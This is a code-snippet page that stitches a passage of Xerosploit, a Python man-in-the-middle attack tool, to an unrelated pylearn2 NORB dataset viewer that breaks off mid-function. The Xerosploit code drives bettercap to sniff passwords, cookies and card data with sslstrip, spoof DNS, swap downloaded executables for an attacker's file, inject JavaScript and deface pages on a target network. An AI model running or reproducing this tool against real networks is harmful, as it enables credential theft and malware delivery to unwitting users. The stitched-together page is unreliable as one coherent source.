									inject_html()

							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								inject_html()
						inject_html()


					elif options == "rdownload":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                       Replace Download                       █
█                                                              █
█            Replace files being downloaded via HTTP           █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def rdownload():
							print("\033[1;32m\n[+] Please type 'run' to execute the 'rdownload' command.\n\033[1;m")
							action_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip() 
							if action_rdownload == "back":
								option()
							elif action_rdownload == "exit":
								sys.exit(exit_msg)	
							elif action_rdownload == "home":
								home()
							elif action_rdownload == "run":
								module = "/opt/xerosploit/tools/bettercap/modules/http/replace_file.rb"
								print("\033[1;32m\n[+] Specify the extension of the files to replace. (e.g. exe)\n\033[1;m")
								ext_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip()
								print("\033[1;32m\n[+] Set the file to use in order to replace the ones matching the extension.\n\033[1;m")
								file_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m")
								file_rdownload = file_rdownload.replace("'","")
								if file_rdownload == "back":
									rdownload()
								elif file_rdownload == "home":
									home()
								elif file_rdownload == "exit":
									sys.exit(exit_msg)
								else:
								
									print("\033[1;34m\n[++] All ." + ext_rdownload + " files will be replaced by " + file_rdownload + "  \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_rdownload = os.system("xettercap " + target_parse + target_ips + " --proxy-module='/opt/xerosploit/tools/bettercap/modules/replace_file.rb' --file-extension " + ext_rdownload + " --file-replace " + file_rdownload + " -I " + up_interface + " --gateway " + gateway )
									rdownload()						
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								rdownload()
						rdownload()
					elif options == "sniff":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")

						def snif():
							print("\033[1;32m\n[+] Please type 'run' to execute the 'sniff' command.\n\033[1;m")
							action_snif = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_snif == "back":
								option()
							elif action_snif == "exit":
								sys.exit(exit_msg)	
							elif action_snif == "home":
								home()
							elif action_snif == "run":
								def snif_sslstrip():

									print("\033[1;32m\n[+] Do you want to load sslstrip ? (y/n).\n\033[1;m")
									action_snif_sslstrip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
									if action_snif_sslstrip == "y":
										print("\033[1;34m\n[++] All logs are saved on : /opt/xerosploit/xerosniff \033[1;m")
										print("\033[1;34m\n[++] Sniffing on " + target_name + "\033[1;m")
										print("\033[1;34m\n[++] sslstrip : \033[1;32mON\033[0m \033[1;m")
										print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")

										date = os.popen("""date | awk '{print $2"-"$3"-"$4}'""").read()
										filename = target_ips + date
										filename = filename.replace("\n","")
										make_file = os.system("mkdir -p /opt/xerosploit/xerosniff && cd /opt/xerosploit/xerosniff && touch " + filename + ".log")
										cmd_show_log = os.system("""xterm -geometry 100x24 -T 'Xerosploit' -hold -e "tail -f /opt/xerosploit/xerosniff/""" + filename + """.log  | GREP_COLOR='01;36' grep --color=always -E '""" + target_ips +  """|DNS|COOKIE|POST|HEADERS|BODY|HTTPS|HTTP|MQL|SNPP|DHCP|WHATSAPP|RLOGIN|IRC|SNIFFER|PGSQL|NNTP|DICT|CREDITCARD|HTTPAUTH|TEAMVIEWER|MAIL|SNMP|MPD|NTLMSS|FTP|REDIS|GET|$'" > /dev/null 2>&1 &""")
										cmd_snif = os.system("xettercap --proxy " + target_parse + target_ips + " -P MYSQL,SNPP,DHCP,WHATSAPP,RLOGIN,IRC,HTTPS,POST,PGSQL,NNTP,DICT,CREDITCARD,HTTPAUTH,TEAMVIEWER,MAIL,SNMP,MPD,COOKIE,NTLMSS,FTP,REDIS -I " + up_interface + " --gateway " + gateway + " -O, --log /opt/xerosploit/xerosniff/" + filename + ".log --sniffer-output /opt/xerosploit/xerosniff/" + filename + ".pcap")
										def snifflog():
											print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m")
											action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
											if action_log == "n":
												cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*")
												print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "y":
												print("\033[1;32m\n[++] Logs have been saved. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "exit":
												sys.exit(exit_msg)


											else:
												print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
												snifflog()
										snifflog()

									elif action_snif_sslstrip == "n":
										print("\033[1;34m\n[++] All logs are saved on : /opt/xerosploit/xerosniff \033[1;m")
										print("\033[1;34m\n[++] Sniffing on " + target_name + "\033[1;m")
										print("\033[1;34m\n[++] sslstrip : \033[1;91mOFF\033[0m \033[1;m")
										print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
										
										date = os.popen("""date | awk '{print $2"-"$3"-"$4}'""").read()
										filename = target_ips + date
										filename = filename.replace("\n","")
										make_file = os.system("mkdir -p /opt/xerosploit/xerosniff && cd /opt/xerosploit/xerosniff && touch " + filename + ".log")
										cmd_show_log = os.system("""xterm -geometry 100x24 -T 'Xerosploit' -hold -e "tail -f /opt/xerosploit/xerosniff/""" + filename + """.log  | GREP_COLOR='01;36' grep --color=always -E '""" + target_ips +  """|DNS|COOKIE|POST|HEADERS|BODY|HTTPS|HTTP|MQL|SNPP|DHCP|WHATSAPP|RLOGIN|IRC|SNIFFER|PGSQL|NNTP|DICT|CREDITCARD|HTTPAUTH|TEAMVIEWER|MAIL|SNMP|MPD|NTLMSS|FTP|REDIS|GET|$'" > /dev/null 2>&1 &""")
										cmd_snif = os.system("xettercap " + target_parse + target_ips + " -P MYSQL,SNPP,DHCP,WHATSAPP,RLOGIN,IRC,HTTPS,POST,PGSQL,NNTP,DICT,CREDITCARD,HTTPAUTH,TEAMVIEWER,MAIL,SNMP,MPD,COOKIE,NTLMSS,FTP,REDIS -I " + up_interface + " --gateway " + gateway + " -O, --log /opt/xerosploit/xerosniff/" + filename + ".log --sniffer-output /opt/xerosploit/xerosniff/" + filename + ".pcap")

										
										def snifflog():
											print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m")
											action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
											if action_log == "n":
												cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*")
												print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "y":
												print("\033[1;32m\n[++] Logs have been saved. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "exit":
												sys.exit(exit_msg)


											else:
												print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
												snifflog()
										snifflog()

									elif action_snif == "back":
										snif()
									elif action_snif == "exit":
										sys.exit(exit_msg)	
									elif action_snif == "home":
										home()
									else:
										print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
										snif_sslstrip()
								snif_sslstrip()
							
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								snif()

						snif()

					elif options == "dspoof":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def dspoof():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'dspoof' command.\n\033[1;m")
							action_dspoof = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_dspoof == "back":
								option()
							elif action_dspoof == "exit":
								sys.exit(exit_msg)	
							elif action_dspoof == "home":
								home()
							elif action_dspoof == "run":
								print("\033[1;32m\n[+] Enter the IP address where you want to redirect the traffic.\n\033[1;m")
								action_dspoof_ip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
								dns_conf = action_dspoof_ip + " .*\.*"
								outdns = open('/opt/xerosploit/tools/files/dns.conf','w')
								outdns.write(dns_conf)
								outdns.close()

								print("\033[1;34m\n[++] Redirecting all the traffic to " + action_dspoof_ip + " ... \033[1;m")
								print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")

								cmd_dspoof = os.system("xettercap " + target_parse + target_ips + " --dns /opt/xerosploit/tools/files/dns.conf --custom-parser DNS -I " + up_interface + " --gateway " + gateway)
								dspoof()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								dspoof()
						dspoof()
					elif options == "yplay":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Yplay                             █
█                                                              █
█    PLay youtube videos as background sound in all webpages   █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def yplay():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'yplay' command.\n\033[1;m")
							action_yplay = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_yplay == "back":
								option()
							elif action_yplay == "exit":
								sys.exit(exit_msg)	
							elif action_yplay == "home":
								home()
							elif action_yplay == "run":
								print("\033[1;32m\n[+] Insert a youtube video ID. (e.g. NvhZu5M41Z8)\n\033[1;m")
								video_id = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
								if video_id == "back":
									option()
								elif video_id == "": # if raw = null
									print("\033[1;91m\n[!] Error : Please specify your video ID.\033[1;m")
									yplay()
								elif video_id == "exit":
									sys.exit(exit_msg)	
								elif video_id == "home":
									home()
								else:
									code = "<head> <iframe width='0' height='0' src='http://www.youtube.com/embed/" + video_id + "?autoplay=1' frameborder='0' allowfullscreen></iframe>"
									code_yplay = open('/opt/xerosploit/tools/bettercap/modules/tmp/yplay.txt','w')
									code_yplay.write(code)
									code_yplay.close()
									print("\033[1;34m\n[++] PLaying : https://www.youtube.com/watch?v=" + video_id + " \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_yplay = os.system("xettercap " + target_parse + target_ips + " --proxy-module='/opt/xerosploit/tools/bettercap/modules/rickroll.rb' -I " + up_interface + " --gateway " + gateway)
									yplay()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								yplay()
						yplay()


					elif options == "replace":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def replace():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'replace' command.\n\033[1;m")
							action_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_replace == "back":
								option()
							elif action_replace == "exit":
								sys.exit(exit_msg)	
							elif action_replace == "home":
								home()
							elif action_replace == "run":
								print("\033[1;32m\n[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)\n\033[1;m")
								img_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m")
								img_replace = img_replace.replace("'","")
								if img_replace == "back":
									replace()
								elif img_replace == "exit":
									sys.exit(exit_msg)	
								elif img_replace == "home":
									home()
								else:
									from PIL import Image
									img = Image.open(img_replace)
									img.save('/opt/xerosploit/tools/bettercap/modules/tmp/ximage.png')
									print("\033[1;34m\n[++] All images will be replaced by " + img_replace + "\033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									

									cmd_replace = os.system("xettercap " + target_parse + target_ips + " --proxy-module='/opt/xerosploit/tools/bettercap/modules/replace_images.rb' --httpd --httpd-path /opt/xerosploit/tools/bettercap/modules/tmp/ -I " + up_interface + " --gateway " + gateway)

									replace()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								replace()

						replace()


					elif options == "driftnet":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Driftnet                          █
█                                                              █
█          View all images requested by your target            █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def driftnet():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'driftnet' command.\n\033[1;m")
							action_driftnet = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdriftnet\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_driftnet == "back":
								option()
							elif action_driftnet == "exit":
								sys.exit(exit_msg)	
							elif action_driftnet == "home":
								home()
							elif action_driftnet == "run":
								print("\033[1;34m\n[++] Capturing requested images on " + target_name + " ... \033[1;m")
								print("\033[1;34m\n[++] All captured images will be temporarily saved in /opt/xerosploit/xedriftnet \033[1;m")
								print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
								cmd_driftnet = os.system("mkdir -p /opt/xerosploit/xedriftnet && driftnet -d /opt/xerosploit/xedriftnet > /dev/null 2>&1 &")
								cmd_driftnet_sniff = os.system("xettercap  -X")
								cmd_driftnet_2 = os.system("rm -R /opt/xerosploit/xedriftnet")
								driftnet()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								driftnet()
						driftnet()

					elif options == "move":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Shakescreen                        █
█                                                              █
█                   Shaking Web Browser content                █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def shakescreen():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'move' command.\n\033[1;m")
							action_shakescreen = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mshakescreen\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_shakescreen == "back":
								option()
							elif action_shakescreen == "exit":
								sys.exit(exit_msg)	
							elif action_shakescreen == "home":
								home()
							elif action_shakescreen == "run":
								print("\033[1;34m\n[++] Injecting shakescreen.js  ... \033[1;m")
								print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
								cmd_shakescreen = os.system("xettercap " + target_parse + target_ips + " --proxy-module=injectjs --js-file '/opt/xerosploit/tools/bettercap/modules/js/shakescreen.js' -I " + up_interface + " --gateway " + gateway)
								shakescreen()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								shakescreen()

						shakescreen()

					elif options == "injectjs":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                       Inject Javascript                      █
█                                                              █
█       Inject Javascript code in all visited webpage.         █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def inject_j():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'injectjs' command.\n\033[1;m")
							action_inject_j = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_inject_j == "back":
								option()
							elif action_inject_j == "exit":
								sys.exit(exit_msg)	
							elif action_inject_j == "home":
								home()
							elif action_inject_j == "run":
								print("\033[1;32m\n[+] Specify the file containing js code you would like to inject.\n\033[1;m")
								js_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m")
								js_file = js_file.replace("'","")
								if js_file == "back":
									inject_j()
								elif js_file == "exit":
									sys.exit(exit_msg)	
								elif js_file == "home":
									home()
								else:

									print("\033[1;34m\n[++] Injecting Javascript code ... \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_inject_j = os.system("xettercap " + target_parse + target_ips + " --proxy-module=injectjs --js-file " + js_file + " -I " + up_interface + " --gateway " + gateway)
									inject_j()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								inject_j()

						inject_j()

					elif options == "deface":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                        Deface Web Page                       █
█                                                              █
█        Overwrite all web pages with your HTML code           █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def deface():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'deface' command.\n\033[1;m")
							action_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_deface == "back":
								option()
							elif action_deface == "exit":
								sys.exit(exit_msg)	
							elif action_deface == "home":
								home()
							elif action_deface == "run":
								print("\033[1;32m\n[+] Specify the file containing your defacement code .\033[1;m")
								print("\033[1;33m\n[!] Your file should not contain Javascript code .\n\033[1;m")
								
								file_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m")
								
								if file_deface == "back":
									option()
								elif file_deface == "exit":
									sys.exit(exit_msg)	
								elif file_deface == "home":
									home()
								else:
									file_deface = file_deface.replace("'","")
									file_deface  = open(file_deface, 'r').read()
									file_deface = file_deface.replace("\n","")

									print("\033[1;34m\n[++] Overwriting all web pages ... \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")

									
									content = """<script type='text/javascript'> window.onload=function(){docuement.body.innerHTML = " """ + file_deface + """ ";}</script>"""
									f1 = open('/home/home/xero-html.html','w')
									f1.write(content)
									f1.close()

									cmd_inject = os.system("xettercap " + target_parse + target_ips + " --proxy-module=/opt/xerosploit/tools/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file /home/home/xero-html.html -I " + up_interface + " --gateway " + gateway )
									deface()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								deface()

						deface()

					elif options == "back":
						target_ip()	
					elif options == "exit":
								sys.exit(exit_msg)	
					elif options == "home":
						home()
					# Show disponible modules.
					elif options == "help":
						print ("")
						table_datas = [
		    				["\033[1;36m\n\n\n\n\n\n\n\n\n\n\n\n\n\nMODULES\n", """
pscan       :  Port Scanner

dos         :  DoS Attack

ping        :  Ping Request

injecthtml  :  Inject Html code

injectjs    :  Inject Javascript code

rdownload   :  Replace files being downloaded

sniff       :  Capturing information inside network packets

dspoof      :  Redirect all the http traffic to the specified one IP

yplay       :  Play background sound in target browser

replace     :  Replace all web pages images with your own one

driftnet    :  View all images requested by your targets

move        :  Shaking Web Browser content

deface      :  Overwrite all web pages with your HTML code\n\033[1;m"""]
						]
						table = DoubleTable(table_datas)
						print(table.table)
						option()
					else:
						print("\033[1;91m\n[!] Error : Module not found . Type 'help' to view the modules list. \033[1;m")
						option()
				option()



			if target_ips == "back":
				home()
			elif target_ips == "exit":
								sys.exit(exit_msg)	
			elif target_ips == "home":
				home()
			elif target_ips == "help":
				table_datas = [
		    		["\033[1;36m\nInformation\n", "\nInsert your target IP address.\nMultiple targets : ip1,ip2,ip3,... \nThe 'all' command will target all your network.\n\n\033[1;m"]
				]
				table = DoubleTable(table_datas)
				print(table.table)
				target_ip()
		# if target = all the network
			elif target_ips == "all": 

				target_ips = ""
				target_parse = ""
				target_name = "All your network"
				program0()

			else:
				program0()







		def cmd0():
			while True:
				print("\033[1;32m\n[+] Please type 'help' to view commands.\n\033[1;m")
				cmd_0 = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
				if cmd_0 == "scan": # Map the network
					print("\033[1;34m\n[++] Mapping your network ... \n\033[1;m")
					scan()
				elif cmd_0 == "start": # Skip network mapping and directly choose a target.
					target_ip()
				elif cmd_0 == "gateway": # Change gateway
					def gateway():
						print("")
						table_datas = [
			    			["\033[1;36m\nInformation\n", "\nManually set  your gateway.\nInsert '0' if you want to choose your default network gateway.\n\033[1;m"]
						]
						table = DoubleTable(table_datas)
						print(table.table)

						print("\033[1;32m\n[+] Enter your network gateway.\n\033[1;m")
						n_gateway = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mgateway\033[0m\033[1;36m ➮ \033[1;m").strip()
			
						if n_gateway == "back":
							home()
						elif n_gateway == "exit":
								sys.exit(exit_msg)	
						elif n_gateway == "home":
							home()
						else:

							s_gateway = open('/opt/xerosploit/tools/files/gateway.txt','w')
							s_gateway.write(n_gateway)
							s_gateway.close()

							home()
					gateway()

				elif cmd_0 == "iface": # Change network interface.
					def iface():
						print ("")
						table_datas = [
			    			["\033[1;36m\nInformation\n", "\nManually set your network interface.\nInsert '0' if you want to choose your default network interface.\n\033[1;m"]
						]
						table = DoubleTable(table_datas)
						print(table.table)

						print("\033[1;32m\n[+] Enter your network interface.\n\033[1;m")
						n_up_interface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4miface\033[0m\033[1;36m ➮ \033[1;m").strip()

						if n_up_interface == "back":
							home()
						elif n_up_interface == "exit":
								sys.exit(exit_msg)	
						elif n_up_interface == "home":
							home()
						else:
							s_up_interface = open('/opt/xerosploit/tools/files/iface.txt','w')
							s_up_interface.write(n_up_interface)
							s_up_interface.close()

							home()
					iface()		
				elif cmd_0 == "exit":
					sys.exit(exit_msg)

				elif cmd_0 == "home":
					home()

				elif cmd_0 == "rmlog": # Remove all logs
					def rm_log():
						print("\033[1;32m\n[+] Do want to remove all xerosploit logs ? (y/n)\n\033[1;m")
						cmd_rmlog = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mrmlog\033[0m\033[1;36m ➮ \033[1;m").strip()
						if cmd_rmlog == "y":
							rmlog = os.system("rm -f -R /opt/xerosploit/xerosniff/ /opt/xerosploit/tools/log/* /opt/xerosploit/tools/bettercap/modules/tmp/* /opt/xerosploit/tools/files/dns.conf")
							print("\033[1;31m\n[++] All logs have been removed. \n\033[1;m")
							sleep(1)
							home()
						elif cmd_rmlog == "n":
							home()
						
						elif cmd_rmlog == "exit":
							sys.exit(exit_msg)

						elif cmd_rmlog == "home":
							home()
						elif cmd_rmlog == "back":
							home()
						else:
							print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
							rm_log()
					rm_log()	
# Principal commands
				elif cmd_0 == "help":
					print ("")
					table_datas = [
			    		["\033[1;36m\n\n\n\nCOMMANDS\n", """
scan     :  Map your network.

iface    :  Manually set your network interface.

gateway  :  Manually set your gateway.

start    :  Skip scan and directly set your target IP address.

rmlog    :  Delete all xerosploit logs.

help     :  Display this help message.

exit     :  Close Xerosploit.\n\033[1;m"""]
					]
					table = DoubleTable(table_datas)
					print(table.table)


				else:
					print("\033[1;91m\n[!] Error : Command not found.\033[1;m")


		home()			
		cmd0()


	except KeyboardInterrupt:
		print ("\n" + exit_msg)
		sleep(1)
	except Exception:
		traceback.print_exc(file=sys.stdout)
	sys.exit(0)

Example 162

Project: pylearn2 Source File: browse_norb.py
def main():
    """Top-level function."""

    args = _parse_args()

    if args.pkl is not None:
        dataset = serial.load(args.pkl)
    else:
        dataset = NORB(args.which_norb, args.which_set)

    # Indexes into the first 5 labels, which live on a 5-D grid.
    grid_indices = [0, ] * 5

    grid_to_short_label = _make_grid_to_short_label(dataset)

    # Maps 5-D label vector to a list of row indices for dataset.X, dataset.y
    # that have those labels.
    label_to_row_indices = _make_label_to_row_indices(dataset.y)

    # Indexes into the row index lists returned by label_to_row_indices.
    object_image_index = [0, ]
    blank_image_index = [0, ]
    blank_label = _get_blank_label(dataset)

    # Index into grid_indices currently being edited
    grid_dimension = [0, ]

    dataset_is_stereo = 's' in dataset.view_converter.axes
    figure, all_axes = pyplot.subplots(1,
                                       3 if dataset_is_stereo else 2,
                                       squeeze=True,
                                       figsize=(10, 3.5))

    set_name = (os.path.split(args.pkl)[1] if args.which_set is None
                else "%sing set" % args.which_set)
    figure.canvas.set_window_title("NORB dataset (%s)" % set_name)

    label_text = figure.suptitle('Up/down arrows choose label, '
                                 'left/right arrows change it',
                                 x=0.1,
                                 horizontalalignment="left")

    # Hides axes' tick marks
    for axes in all_axes:
        axes.get_xaxis().set_visible(False)
        axes.get_yaxis().set_visible(False)

    text_axes, image_axes = (all_axes[0], all_axes[1:])
    image_captions = (('left', 'right') if dataset_is_stereo
                      else ('mono image', ))

    if args.stereo_viewer:
        image_captions = tuple(reversed(image_captions))

    for image_ax, caption in safe_zip(image_axes, image_captions):
        image_ax.set_title(caption)

    text_axes.set_frame_on(False)  # Hides background of text_axes

    def is_blank(grid_indices):
        assert len(grid_indices) == 5
        assert all(x >= 0 for x in grid_indices)

        ci = dataset.label_name_to_index['category']  # category index
        category = grid_to_short_label[ci][grid_indices[ci]]
        category_name = dataset.label_to_value_funcs[ci](category)
        return category_name == 'blank'

    def get_short_label(grid_indices):
        """
        Returns the first 5 elements of the label vector pointed to by
        grid_indices. We use the first 5, since they're the labels used by
        both the 'big' and Small NORB datasets.
        """

        # Need to special-case the 'blank' category, since it lies outside of
        # the grid.
        if is_blank(grid_indices):   # won't happen with SmallNORB
            return tuple(blank_label[:5])
        else:
            return tuple(grid_to_short_label[i][g]
                         for i, g in enumerate(grid_indices))

    def get_row_indices(grid_indices):
        short_label = get_short_label(grid_indices)
        return label_to_row_indices.get(short_label, None)

    axes_to_pixels = {}

    def redraw(redraw_text, redraw_images):
        row_indices = get_row_indices(grid_indices)

        if row_indices is None:
            row_index = None
            image_index = 0
            num_images = 0
        else:
            image_index = (blank_image_index
                           if is_blank(grid_indices)
                           else object_image_index)[0]
            row_index = row_indices[image_index]
            num_images = len(row_indices)

        def draw_text():
            if row_indices is None:
                padding_length = dataset.y.shape[1] - len(grid_indices)
                current_label = (tuple(get_short_label(grid_indices)) +
                                 (0, ) * padding_length)
            else:
                current_label = dataset.y[row_index, :]

            label_names = dataset.label_index_to_name

            label_values = [label_to_value(label) for label_to_value, label
                            in safe_zip(dataset.label_to_value_funcs,
                                        current_label)]

            lines = ['%s: %s' % (t, v)
                     for t, v
                     in safe_zip(label_names, label_values)]

            if dataset.y.shape[1] > 5:
                # Inserts image number & blank line between editable and
                # fixed labels.
                lines = (lines[:5] +
                         ['No such image' if num_images == 0
                          else 'image: %d of %d' % (image_index + 1,
                                                    num_images),
                          '\n'] +
                         lines[5:])

            # prepends the current index's line with an arrow.
            lines[grid_dimension[0]] = '==> ' + lines[grid_dimension[0]]

            text_axes.clear()

            # "transAxes": 0, 0 = bottom-left, 1, 1 at upper-right.
            text_axes.text(0, 0.5,  # coords
                           '\n'.join(lines),
                           verticalalignment='center',
                           transform=text_axes.transAxes)

        def draw_images():
            if row_indices is None:
                for axis in image_axes:
                    axis.clear()
            else:
                data_row = dataset.X[row_index:row_index + 1, :]

                axes_names = dataset.view_converter.axes
                assert len(axes_names) in (4, 5)
                assert axes_names[0] == 'b'
                assert axes_names[-3] == 0
                assert axes_names[-2] == 1
                assert axes_names[-1] == 'c'

                def draw_image(image, axes):
                    assert len(image.shape) == 2
                    norm = matplotlib.colors.NoNorm() if args.no_norm else None
                    axes_to_pixels[axes] = image
                    axes.imshow(image, norm=norm, cmap='gray')

                if 's' in axes_names:
                    image_pair = \
                        dataset.get_topological_view(mat=data_row,
                                                     single_tensor=True)
                    # Shaves off the singleton dimensions
                    # (batch # and channel #), leaving just 's', 0, and 1.
                    image_pair = tuple(image_pair[0, :, :, :, 0])

                    if args.stereo_viewer:
                        image_pair = tuple(reversed(image_pair))

                    for axis, image in safe_zip(image_axes, image_pair):
                        draw_image(image, axis)
                else:
                    image = dataset.get_topological_view(mat=data_row)
                    image = image[0, :, :, 0]
                    draw_image(image, image_axes[0])

        if redraw_text:
            draw_text()

        if redraw_images:
            draw_images()

        figure.canvas.draw()

    default_status_text = ("mouseover image%s for pixel values" %
                           ("" if len(image_axes) == 1 else "s"))
    status_text = figure.text(0.5, 0.1, default_status_text)

    def on_mouse_motion(event):
        original_text = status_text.get_text()

        if event.inaxes not in image_axes:
            status_text.set_text(default_status_text)
        else:
            pixels = axes_to_pixels[event.inaxes]
            row = int(event.ydata + .5)
            col = int(event.xdata + .5)
            status_text.set_text("Pixel value: %g" % pixels[row, col])

        if status_text.get_text != original_text:
            figure.canvas.draw()

